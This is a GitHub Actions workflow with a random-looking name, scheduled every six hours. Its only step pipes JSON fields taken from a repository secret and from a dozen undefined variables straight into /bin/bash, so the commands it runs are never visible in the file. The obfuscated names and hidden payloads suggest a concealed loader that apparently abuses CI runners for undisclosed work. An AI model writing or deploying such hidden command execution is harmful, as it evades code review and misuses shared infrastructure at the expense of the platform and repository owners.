name: mengtancheng9845

on:
  workflow_dispatch:
  schedule:
    - cron: '43 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mengtancheng9845
        env:
          g86210: ${{ secrets.g86210 }}
        run: |
          echo $g86210 | jq -r .a94 | /bin/bash
          echo $ne7170 | jq -r .afa88 | /bin/bash
          echo $e3951 | jq -r .vkefs52 | /bin/bash
          echo $qg73160 | jq -r .mtr41696 | /bin/bash
          echo $t434 | jq -r .rqqn5087 | /bin/bash
          echo $lbjbg9012 | jq -r .qdun737 | /bin/bash
          echo $qr9 | jq -r .gu5 | /bin/bash
          echo $v3831 | jq -r .wtpsa1 | /bin/bash
          echo $b584 | jq -r .wiw5 | /bin/bash
          echo $ap52865 | jq -r .feqoo6 | /bin/bash
          echo $hzlrl69 | jq -r .fawi1 | /bin/bash
          echo $pcrfc4148 | jq -r .qa122 | /bin/bash
          echo $jnpjd362 | jq -r .tld3672 | /bin/bash

